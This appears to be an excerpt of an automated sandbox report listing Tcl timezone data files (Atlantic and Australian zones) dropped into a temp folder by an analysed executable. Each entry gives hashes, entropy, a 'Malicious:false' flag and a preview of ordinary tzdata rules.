                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):9568
                                                                                                                                                                                                                                                    Entropy (8bit):3.8487941547305065
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:192:jZ5Jmz1qVIZtQIMj544IrvfMsbxZTH7qwQ:jZ5Jmz1qVIZtbMUM8xZTH7qwQ
                                                                                                                                                                                                                                                    MD5:7C1BFAE290B201F8DEAC71F0B02FF161
                                                                                                                                                                                                                                                    SHA1:99B24D6A564560B973AEBAB0EA5FAC74FF070AEB
                                                                                                                                                                                                                                                    SHA-256:A58D2E3726BAF8EA030EB684DC326C14AC436C5398E50F0DF04F0BE1A7E117F2
                                                                                                                                                                                                                                                    SHA-512:486A434CB27CF8EC91768344298D3F6E9CB5BAC3BD29C622E91D087C5C20019FECF78D6F654002B735A86768CB45622B92B10885AEF56FDDC0136C47DDF81270
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Atlantic/Madeira) {. {-9223372036854775808 -4056 0 LMT}. {-2713906344 -4056 0 FMT}. {-1830379944 -3600 0 MADT}. {-1689552000 0 1 MADST}. {-1677798000 -3600 0 MADT}. {-1667433600 0 1 MADST}. {-1647734400 -3600 0 MADT}. {-1635811200 0 1 MADST}. {-1616198400 -3600 0 MADT}. {-1604361600 0 1 MADST}. {-1584662400 -3600 0 MADT}. {-1572739200 0 1 MADST}. {-1553040000 -3600 0 MADT}. {-1541203200 0 1 MADST}. {-1521504000 -3600 0 MADT}. {-1442448000 0 1 MADST}. {-1426809600 -3600 0 MADT}. {-1379289600 0 1 MADST}. {-1364774400 -3600 0 MADT}. {-1348444800 0 1 MADST}. {-1333324800 -3600 0 MADT}. {-1316390400 0 1 MADST}. {-1301270400 -3600 0 MADT}. {-1284336000 0 1 MADST}. {-1269820800 -3600 0 MADT}. {-1221436800 0 1 MADST}. {-1206921600 -3600 0 MADT}. {-1191196800 0 1 MADST}. {-1175472000 -3600 0 MADT}. {-1127692800 0 1 MADST}. {-1111968000 -3600 0 MAD

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Atlantic\Reykjavik

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1995
                                                                                                                                                                                                                                                    Entropy (8bit):3.9109506980242084
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:48:59GWG3eGvGM1GQGAGlGdG38GCGu9GoGllG7yGPGYvGHGqGCGEFGrOG6BGFGjGgGx:el39eM0nXkM3TxBvi7h+YemJx1htEy3x
                                                                                                                                                                                                                                                    MD5:A6E7CF77C9FA8AA0B8B0FC6B51C2EC26
                                                                                                                                                                                                                                                    SHA1:24FE9205BB89CB22ADCA1096C64BC75CCFC49B57
                                                                                                                                                                                                                                                    SHA-256:D46C1CC9041CE8D95BAA10F32E3C0A37C682F6FC9841D2BD75830F1CD9DDB3DE
                                                                                                                                                                                                                                                    SHA-512:0839D74F81A6F4FAA2DD0DA04B9954C7F15FB3023659354A8147A84F42756A2E4CDC12A958323DC8E220FF4D3A0AD7BC3F44251900D729217781C724957E7F7B
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Atlantic/Reykjavik) {. {-9223372036854775808 -5280 0 LMT}. {-1956609120 -3600 0 IST}. {-1668211200 0 1 ISST}. {-1647212400 -3600 0 IST}. {-1636675200 0 1 ISST}. {-1613430000 -3600 0 IST}. {-1605139200 0 1 ISST}. {-1581894000 -3600 0 IST}. {-1539561600 0 1 ISST}. {-1531350000 -3600 0 IST}. {-968025600 0 1 ISST}. {-952293600 -3600 0 IST}. {-942008400 0 1 ISST}. {-920239200 -3600 0 IST}. {-909957600 0 1 ISST}. {-888789600 -3600 0 IST}. {-877903200 0 1 ISST}. {-857944800 -3600 0 IST}. {-846453600 0 1 ISST}. {-826495200 -3600 0 IST}. {-815004000 0 1 ISST}. {-795045600 -3600 0 IST}. {-783554400 0 1 ISST}. {-762991200 -3600 0 IST}. {-752104800 0 1 ISST}. {-731541600 -3600 0 IST}. {-717631200 0 1 ISST}. {-700092000 -3600 0 IST}. {-686181600 0 1 ISST}. {-668642400 -3600 0 IST}. {-654732000 0 1 ISST}. {-636588000 -3600 0 IST}. {-623282400 0 1

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Atlantic\South_Georgia

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):154
                                                                                                                                                                                                                                                    Entropy (8bit):5.004788019784553
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SlEVFRKvJT8QFx52RQqGtlN62/EUXGm2OHXT14YvXhFvd6WL:SlSWB9X52RQrlo2Mbm2OHXqYPTF6WL
                                                                                                                                                                                                                                                    MD5:954625C02619664D3B5C4B72A22D8C51
                                                                                                                                                                                                                                                    SHA1:933A7E9368864232B29823FEEFE045032BE154A5
                                                                                                                                                                                                                                                    SHA-256:D23882718ECEB397D330B463DCA1C7E266134F060E0AED421F056E7379E3E1A3
                                                                                                                                                                                                                                                    SHA-512:DD9E58A17967F91937BB71C6A9DD296B4AE49DD7C264874E6720D2B521EAFC1D4F3BF0CA66F931BA16499225390DD963110E9FE8524130F407328E3E9F8BD8BE
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Atlantic/South_Georgia) {. {-9223372036854775808 -8768 0 LMT}. {-2524512832 -7200 0 GST}.}.

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Atlantic\St_Helena

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):184
                                                                                                                                                                                                                                                    Entropy (8bit):4.831929124818878
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqss1kvFVAIgNGE4Rvt2RQqGt4r+DcsP:SlSWB9IZaM3y7sYFVAIgNT4tt2RQr4rC
                                                                                                                                                                                                                                                    MD5:8F4668F0D79577139B59A80D714E45A5
                                                                                                                                                                                                                                                    SHA1:BCD79EDCCB687A2E74794B8CFDE99A7FEC294811
                                                                                                                                                                                                                                                    SHA-256:C78C4E980A378B781ED6D2EA72ABAEF8FFED186538DEB18B61D94B575734FC6A
                                                                                                                                                                                                                                                    SHA-512:08D1472377229BC76A496259344263993791B4DF3F83D94F798779249A5CAE15F6B4341A665387780EA8B1278E9D5FFBCA1BCDE06B3E54750E32078FA482ABD6
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Africa/Abidjan)]} {. LoadTimeZoneFile Africa/Abidjan.}.set TZData(:Atlantic/St_Helena) $TZData(:Africa/Abidjan).

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Atlantic\Stanley

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):2215
                                                                                                                                                                                                                                                    Entropy (8bit):3.889108793636345
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:48:50wqSiSiSafSYSGpSWW75ESrS0SFSpSL/ShSvSCSCZSCSwSKUXSzSNSnSw/S/pSu:Pq5vz9Ny7OSpgEk/kyXZLhWX2IeXApZ5
                                                                                                                                                                                                                                                    MD5:B08E4FE18C411591DB170A4C995088CA
                                                                                                                                                                                                                                                    SHA1:6D3928877CEF2C20924BA30FBF61EA6933EF925C
                                                                                                                                                                                                                                                    SHA-256:E1410499E96950029924485AB21250C09AB0E3494DD05128C935FB99C8BBABE9
                                                                                                                                                                                                                                                    SHA-512:888CBB8C19F677B73D6203B622501922BD4DC59FA6D962A4EEE6C6DA2A0047739346E0794C5F6D0482BDDAB89289479D2A07986C3C23739657B02FF3B4000AB9
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Atlantic/Stanley) {. {-9223372036854775808 -13884 0 LMT}. {-2524507716 -13884 0 SMT}. {-1824235716 -14400 0 FKT}. {-1018209600 -10800 1 FKST}. {-1003093200 -14400 0 FKT}. {-986760000 -10800 1 FKST}. {-971643600 -14400 0 FKT}. {-954705600 -10800 1 FKST}. {-939589200 -14400 0 FKT}. {-923256000 -10800 1 FKST}. {-908139600 -14400 0 FKT}. {-891806400 -10800 1 FKST}. {-876690000 -14400 0 FKT}. {-860356800 -10800 1 FKST}. {420606000 -7200 0 FKT}. {433303200 -7200 1 FKST}. {452052000 -10800 0 FKT}. {464151600 -7200 1 FKST}. {483501600 -10800 0 FKT}. {495597600 -14400 0 FKT}. {495604800 -10800 1 FKST}. {514350000 -14400 0 FKT}. {527054400 -10800 1 FKST}. {545799600 -14400 0 FKT}. {558504000 -10800 1 FKST}. {577249200 -14400 0 FKT}. {589953600 -10800 1 FKST}. {608698800 -14400 0 FKT}. {621403200 -10800 1 FKST}. {640753200 -14400 0 FKT}. {652852800

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Australia\ACT

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):185
                                                                                                                                                                                                                                                    Entropy (8bit):4.813373101386862
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SlEVFRKvJT8QFCZaMuUyq/xJjLHVAIgoXjLSt2QWCCjpMFBx/h4QWCCjLu:SlSWB9IZaM3yI9HVAIgmo2DCeMFB/4D2
                                                                                                                                                                                                                                                    MD5:F48AD4B81CD3034F6E5D3CA1B5A8BDD4
                                                                                                                                                                                                                                                    SHA1:676FE3F50E3E132C1FD185A1EE1D8C830763204F
                                                                                                                                                                                                                                                    SHA-256:553D7DA9A2EDBD933E8920573AE6BCBAA00302817939046CF257CAEACEC19FAD
                                                                                                                                                                                                                                                    SHA-512:36A4E2286FBEF2F4ED4B9CD1A71136E227FEF4B693F9F43649B790E859221EE470679A7E3C283770DA5CB0113A1C8C1F99480E7020328FFE3E9C870798B092F5
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Australia/Sydney)]} {. LoadTimeZoneFile Australia/Sydney.}.set TZData(:Australia/ACT) $TZData(:Australia/Sydney).

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Australia\Adelaide

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):8099
                                                                                                                                                                                                                                                    Entropy (8bit):3.812665609163787
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:96:JPtFF+Wc4CNphbQbPzpRtYac1w6N5HxnLmPaod/gWFXht/c+u8dRYaaiqcdtXHVf:JP5+zNMdYacv5HhLmPajSXz5HV5x
                                                                                                                                                                                                                                                    MD5:4E73BDB571DBF2625E14E38B84C122B4
                                                                                                                                                                                                                                                    SHA1:B9D7B7D2855D102800B53FB304633F5BC961A8D0
                                                                                                                                                                                                                                                    SHA-256:9138DF8A3DE8BE4099C9C14917B5C5FD7EB14751ACCD66950E0FDB686555FFD6
                                                                                                                                                                                                                                                    SHA-512:CF9AB3E9A7C1A76BCC113828ABAF88FE83AAF5CAD7BD181201E06A0CF43E30BA8817AAA88AB3F0F14F459599D91F63ECE851F095154050263C5AD08B2275B4C7
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Australia/Adelaide) {. {-9223372036854775808 33260 0 LMT}. {-2364110060 32400 0 ACST}. {-2230189200 34200 0 ACST}. {-1672565340 37800 1 ACDT}. {-1665390600 34200 0 ACST}. {-883639800 37800 1 ACDT}. {-876126600 34200 0 ACST}. {-860398200 37800 1 ACDT}. {-844677000 34200 0 ACST}. {-828343800 37800 1 ACDT}. {-813227400 34200 0 ACST}. {31501800 34200 0 ACST}. {57688200 37800 1 ACDT}. {67969800 34200 0 ACST}. {89137800 37800 1 ACDT}. {100024200 34200 0 ACST}. {120587400 37800 1 ACDT}. {131473800 34200 0 ACST}. {152037000 37800 1 ACDT}. {162923400 34200 0 ACST}. {183486600 37800 1 ACDT}. {194977800 34200 0 ACST}. {215541000 37800 1 ACDT}. {226427400 34200 0 ACST}. {246990600 37800 1 ACDT}. {257877000 34200 0 ACST}. {278440200 37800 1 ACDT}. {289326600 34200 0 ACST}. {309889800 37800 1 ACDT}. {320776200 34200 0 ACST}. {341339400 37800 1 ACDT}.

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Australia\Brisbane

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):651
                                                                                                                                                                                                                                                    Entropy (8bit):4.265580091557009
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:12:MBp52nmdHLOYPv+tCdd8xdsWz9ag5J4UVdKcWWC:cQne6skVk
                                                                                                                                                                                                                                                    MD5:296B4B78CEE05805E5EE53B4D5F7284F
                                                                                                                                                                                                                                                    SHA1:DDB5B448E99F278C633B2DBD5A816C4DE28DC726
                                                                                                                                                                                                                                                    SHA-256:2580C3EEEC029572A1FF629E393F64E326DEDAA96015641165813718A8891C4D
                                                                                                                                                                                                                                                    SHA-512:9DE71000BB8AC48A82D83399BD707B661B50882EEBFE2A7E58A81A2F6C04B1F711DAE3AA09A77A9EE265FB633B8883D2C01867AF96F8BE5137119E4FB447DF8C
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Australia/Brisbane) {. {-9223372036854775808 36728 0 LMT}. {-2366791928 36000 0 AEST}. {-1672567140 39600 1 AEDT}. {-1665392400 36000 0 AEST}. {-883641600 39600 1 AEDT}. {-876128400 36000 0 AEST}. {-860400000 39600 1 AEDT}. {-844678800 36000 0 AEST}. {-828345600 39600 1 AEDT}. {-813229200 36000 0 AEST}. {31500000 36000 0 AEST}. {57686400 39600 1 AEDT}. {67968000 36000 0 AEST}. {625593600 39600 1 AEDT}. {636480000 36000 0 AEST}. {657043200 39600 1 AEDT}. {667929600 36000 0 AEST}. {688492800 39600 1 AEDT}. {699379200 36000 0 AEST}.}.

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Australia\Broken_Hill

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):8162
                                                                                                                                                                                                                                                    Entropy (8bit):3.820479465698825
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:96:EkxtFF+Wc4Yphbhd1zCRtYac1w6N5HxnLmPaod/gWFXht/c+u8dRYaaiqcdtXHVf:Ekx5+X5sYacv5HhLmPajSXz5HV5x
                                                                                                                                                                                                                                                    MD5:B4AF947B4737537DF09A039D1E500FB8
                                                                                                                                                                                                                                                    SHA1:CCC0DC52D586BFAA7A0E70C80709231B4BB93C54
                                                                                                                                                                                                                                                    SHA-256:80BBD6D25D4E4EFA234EAD3CB4EB801DC576D1348B9A3E1B58F729FEB688196D
                                                                                                                                                                                                                                                    SHA-512:3B27C36FA3034CB371DD07C992B3A5B1357FC7A892C35910DA139C7DA560DDC0AA1E95966438776F75397E7219A7DA0AD4AD6FB922B5E0BE2828D3534488BFD0
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Australia/Broken_Hill) {. {-9223372036854775808 33948 0 LMT}. {-2364110748 36000 0 AEST}. {-2314951200 32400 0 ACST}. {-2230189200 34200 0 ACST}. {-1672565340 37800 1 ACDT}. {-1665390600 34200 0 ACST}. {-883639800 37800 1 ACDT}. {-876126600 34200 0 ACST}. {-860398200 37800 1 ACDT}. {-844677000 34200 0 ACST}. {-828343800 37800 1 ACDT}. {-813227400 34200 0 ACST}. {31501800 34200 0 ACST}. {57688200 37800 1 ACDT}. {67969800 34200 0 ACST}. {89137800 37800 1 ACDT}. {100024200 34200 0 ACST}. {120587400 37800 1 ACDT}. {131473800 34200 0 ACST}. {152037000 37800 1 ACDT}. {162923400 34200 0 ACST}. {183486600 37800 1 ACDT}. {194977800 34200 0 ACST}. {215541000 37800 1 ACDT}. {226427400 34200 0 ACST}. {246990600 37800 1 ACDT}. {257877000 34200 0 ACST}. {278440200 37800 1 ACDT}. {289326600 34200 0 ACST}. {309889800 37800 1 ACDT}. {320776200 34200 0 ACS

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Australia\Canberra

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):190
                                                                                                                                                                                                                                                    Entropy (8bit):4.80238049701662
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SlEVFRKvJT8QFCZaMuUyq/xJjLHVAIgoXjLSt2QWCCjnSV1+QWCCjLu:SlSWB9IZaM3yI9HVAIgmo2DCcq+DCyu
                                                                                                                                                                                                                                                    MD5:16F9CFC4C5B9D5F9F9DB9346CECE4393
                                                                                                                                                                                                                                                    SHA1:ED1ED7BA73EB287D2C8807C4F8EF3EFA516F5A68
                                                                                                                                                                                                                                                    SHA-256:853A159B8503B9E8F42BBCE60496722D0A334FD79F30448BAD651F18BA388055
                                                                                                                                                                                                                                                    SHA-512:9572CCB1BC499BADA72B5FE533B56156DB9EB0DEDFD4AE4397AD60F2A8AF5991F7B1B06A1B8D14C73832543AF8C12F5B16A9A80D093BF0C7ED6E38FF8B66E197
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Australia/Sydney)]} {. LoadTimeZoneFile Australia/Sydney.}.set TZData(:Australia/Canberra) $TZData(:Australia/Sydney).

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Australia\Currie

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):8097
                                                                                                                                                                                                                                                    Entropy (8bit):3.7668602204696375
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:96:GJiG+HuKIyymp8tLhbVXd33cZF7bLaE9DTtM/m7eeYWlQOZIeVUF:GJqXytLhbVXdnPQler
                                                                                                                                                                                                                                                    MD5:7E0D1435E11C9AE84EF1A863D1D90C61
                                                                                                                                                                                                                                                    SHA1:CE76A3D902221F0EF9D8C25EB2D46A63D0D09D0B
                                                                                                                                                                                                                                                    SHA-256:3C0B35627729316A391C5A0BEE3A0E353A0BAEAD5E49CE7827E53D0F49FD6723
                                                                                                                                                                                                                                                    SHA-512:D262294AC611396633184147B0F6656290BF97A298D6F7EC025E1D88AAC5343363744FD1CB849CDE84F3C1B2CF860CFA7CA43453ADBF68B0903DA1361F0DCD69
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Australia/Currie) {. {-9223372036854775808 34528 0 LMT}. {-2345794528 36000 0 AEST}. {-1680508800 39600 1 AEDT}. {-1669892400 39600 0 AEDT}. {-1665392400 36000 0 AEST}. {-883641600 39600 1 AEDT}. {-876128400 36000 0 AEST}. {-860400000 39600 1 AEDT}. {-844678800 36000 0 AEST}. {-828345600 39600 1 AEDT}. {-813229200 36000 0 AEST}. {47138400 36000 0 AEST}. {57686400 39600 1 AEDT}. {67968000 36000 0 AEST}. {89136000 39600 1 AEDT}. {100022400 36000 0 AEST}. {120585600 39600 1 AEDT}. {131472000 36000 0 AEST}. {152035200 39600 1 AEDT}. {162921600 36000 0 AEST}. {183484800 39600 1 AEDT}. {194976000 36000 0 AEST}. {215539200 39600 1 AEDT}. {226425600 36000 0 AEST}. {246988800 39600 1 AEDT}. {257875200 36000 0 AEST}. {278438400 39600 1 AEDT}. {289324800 36000 0 AEST}. {309888000 39600 1 AEDT}. {320774400 36000 0 AEST}. {341337600 39600 1 AEDT}.

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Australia\Darwin

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):422
                                                                                                                                                                                                                                                    Entropy (8bit):4.4678452003570435
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:12:MBp52umdHPPZUj/sVdFFtf/FFAXFFwFFgh:cQuenZq/sVd/tH/AX/w/C
                                                                                                                                                                                                                                                    MD5:FC9689FEF4223726207271E2EAAE6548
                                                                                                                                                                                                                                                    SHA1:26D0B4FC2AD943FCAC90F179F7DF6C18EE12EBB8
                                                                                                                                                                                                                                                    SHA-256:C556C796CCD3C63D9F694535287DC42BB63140C8ED39D31FDA0DA6E94D660A1C
                                                                                                                                                                                                                                                    SHA-512:7898C0DE77297FBAA6AAF9D15CB9765DAF63ED4761BA181D0D1A590A6F19A6B7F6E94564A80EB691ED2D89C96D68449BF57816E4093E5011B93D30C3E1624D60
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Australia/Darwin) {. {-9223372036854775808 31400 0 LMT}. {-2364108200 32400 0 ACST}. {-2230189200 34200 0 ACST}. {-1672565340 37800 1 ACDT}. {-1665390600 34200 0 ACST}. {-883639800 37800 1 ACDT}. {-876126600 34200 0 ACST}. {-860398200 37800 1 ACDT}. {-844677000 34200 0 ACST}. {-828343800 37800 1 ACDT}. {-813227400 34200 0 ACST}.}.

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Australia\Eucla

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):734
                                                                                                                                                                                                                                                    Entropy (8bit):4.311332541012831
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:12:MBp527JmdHvOYP2MWcDmMuUc0kUmM5c6uwmMIUv2ic5HVKmMwcqmMVcmmMscukxU:cQ7JemsnmUduwwRh00xAiNQhqU1
                                                                                                                                                                                                                                                    MD5:AD8EF9C3FFC8A443A4559EC7C6E48D44
                                                                                                                                                                                                                                                    SHA1:B2332BC4EDFDAAEBB7AE59AD3E82FBF5308EC003
                                                                                                                                                                                                                                                    SHA-256:3028DB3A5067D665E11DF993DCB1140CF7A534AF253B1906DAF0BE266A7241BE
                                                                                                                                                                                                                                                    SHA-512:C57A45D3BB50666068616AF9F18C969888C261BC5CA4BFFEAB9D0A456AF52C5D021E0ABBE1776BF9D92A2672D1045E3036A0E649925FF5646FC3E72511D1750D
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Australia/Eucla) {. {-9223372036854775808 30928 0 LMT}. {-2337928528 31500 0 ACWST}. {-1672562640 35100 1 ACWDT}. {-1665387900 31500 0 ACWST}. {-883637100 35100 1 ACWDT}. {-876123900 31500 0 ACWST}. {-860395500 35100 1 ACWDT}. {-844674300 31500 0 ACWST}. {-836473500 35100 0 ACWST}. {152039700 35100 1 ACWDT}. {162926100 31500 0 ACWST}. {436295700 35100 1 ACWDT}. {447182100 31500 0 ACWST}. {690311700 35100 1 ACWDT}. {699383700 31500 0 ACWST}. {1165079700 35100 1 ACWDT}. {1174756500 31500 0 ACWST}. {1193505300 35100 1 ACWDT}. {1206810900 31500 0 ACWST}. {1224954900 35100 1 ACWDT}. {1238260500 31500 0 ACWST}.}.

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Australia\Hobart

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):8325
                                                                                                                                                                                                                                                    Entropy (8bit):3.767204262183229
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:96:8xKiG+HuKIyymp8tLhbVXd33cZF7bLaE9DTtM/m7eeYWlQOZIeVUF:8xKqXytLhbVXdnPQler
                                                                                                                                                                                                                                                    MD5:67AF9A2B827308DD9F7ABEC9441C3250
                                                                                                                                                                                                                                                    SHA1:CD87DD4181B41E66EFEA9C7311D5B7191F41EA3A
                                                                                                                                                                                                                                                    SHA-256:814BD785B5ACDE9D2F4FC6E592E919BA0FE1C3499AFC1071B7FA02608B6032AB
                                                                                                                                                                                                                                                    SHA-512:BC6B8CE215B3B4AC358EB989FB1BB5C6AD61B39B7BBD36AAA924A2352E823C029131E79DA927FEEBDD5CF759FDE527F39089C93B0826995D37052362BEAE09F6
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
